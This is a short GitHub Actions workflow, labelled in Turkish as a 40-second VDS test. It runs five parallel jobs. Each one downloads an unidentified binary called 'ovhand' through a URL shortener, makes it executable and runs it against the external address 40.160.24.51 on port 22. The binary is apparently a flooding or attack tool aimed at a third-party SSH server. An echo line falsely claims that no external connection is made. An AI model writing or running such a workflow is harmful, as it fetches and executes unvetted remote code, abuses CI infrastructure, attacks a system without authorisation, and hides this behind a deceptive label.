name: Ubuntu VDS 40 saniye test

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    concurrency:
      group: vds
      cancel-in-progress: false
    timeout-minutes: 60
    strategy:
      max-parallel: 5
      matrix:
        instance: [1, 2, 3, 4, 5]

    steps:
      - name: Dosyayı indir
        run: |
          echo "Dosya indiriliyor..."
          wget -q https://curl.by/r_4Pr/ovhand -O ovhand
          ls -lh ovhand

      - name: Çalışma izni ver
        run: |
          chmod +x ovhand
          echo "İzinler ayarlandı."

      - name: Test çalıştır
        run: |
          echo "Bu sadece testtir, dış IP'ye bağlantı açılmaz."
          timeout 10s ./ovhand 40.160.24.51 22 10 50

      - name: Bekle
        run: sleep 40
